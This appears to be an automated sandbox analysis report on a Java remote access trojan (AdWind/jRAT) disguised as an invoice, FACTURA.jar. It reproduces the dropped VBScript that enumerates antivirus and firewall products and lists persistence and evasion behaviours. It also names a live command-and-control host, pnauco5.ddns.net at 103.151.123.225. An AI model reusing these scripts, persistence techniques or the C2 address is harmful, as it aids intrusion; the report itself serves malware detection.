Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext Jump to dropped file
Yara detected AdWind RATs dll
Source: Yara match File source: 6.2.javaw.exe.73ac0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll, type: DROPPED
Java source code contains strings found in CrossRAT
Source: ultekbvsw.txt.5.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.963648387626213409653739306438380.class.6.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC11B0 _Java_com_Title_disableListener@8, 6_2_73AC11B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC1110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW, 6_2_73AC1110
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426949 Sample: FACTURA.jar Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 92 pnauco5.ddns.net 2->92 98 Malicious sample detected (through community Yara rule) 2->98 100 Antivirus detection for dropped file 2->100 102 Multi AV Scanner detection for dropped file 2->102 106 12 other signatures 2->106 12 cmd.exe 2 2->12         started        signatures3 104 Uses dynamic DNS services 92->104 process4 signatures5 122 Uses regedit.exe to modify the Windows registry 12->122 15 java.exe 10 12->15         started        18 conhost.exe 12->18         started        process6 file7 90 C:\Users\user\gcahfpmhcn.js, ASCII 15->90 dropped 20 wscript.exe 1 2 15->20         started        23 icacls.exe 1 15->23         started        process8 signatures9 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->108 25 javaw.exe 24 20->25         started        30 conhost.exe 23->30         started        process10 dnsIp11 94 pnauco5.ddns.net 103.151.123.225, 49740, 5000 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown 25->94 96 127.0.0.1 unknown unknown 25->96 82 C:\Users\...\Windows266478547194213581.dll, PE32 25->82 dropped 84 C:\Users\...\mqjqrgZaqQ856862126040995288.reg, ASCII 25->84 dropped 86 C:\Users\...\Retrive536118811270301171.vbs, ASCII 25->86 dropped 88 C:\Users\...\Retrive4451837785175678294.vbs, ASCII 25->88 dropped 110 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->110 112 Excessive usage of taskkill to terminate processes 25->112 32 xcopy.exe 25->32         started        35 cmd.exe 25->35         started        37 java.exe 9 25->37         started        39 26 other processes 25->39 file12 signatures13 process14 file15 70 C:\Users\user\AppData\Roaming\...\zip.dll, PE32 32->70 dropped 72 C:\Users\user\AppData\...\wsdetect.dll, PE32 32->72 dropped 74 C:\Users\user\AppData\...\w2k_lsa_auth.dll, PE32 32->74 dropped 80 132 other malicious files 32->80 dropped 41 conhost.exe 32->41         started        43 regedit.exe 35->43         started        46 conhost.exe 35->46         started        76 C:\Users\...\Retrive6922435490390475939.vbs, ASCII 37->76 dropped 78 C:\Users\...\Retrive2729271214941122137.vbs, ASCII 37->78 dropped 48 cmd.exe 37->48         started        50 cmd.exe 37->50         started        52 xcopy.exe 37->52         started        54 conhost.exe 37->54         started        56 conhost.exe 39->56         started        58 27 other processes 39->58 process16 signatures17 114 Creates an undocumented autostart registry key 43->114 116 Disables zone checking for all users 43->116 118 Creates a Image File Execution Options (IFEO) Debugger entry 43->118 120 3 other signatures 43->120 60 conhost.exe 48->60         started        62 cscript.exe 48->62         started        64 conhost.exe 50->64         started        66 cscript.exe 50->66         started        68 conhost.exe 52->68         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.151.123.225
 pnauco5.ddns.net unknown
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
pnauco5.ddns.net 103.151.123.225 true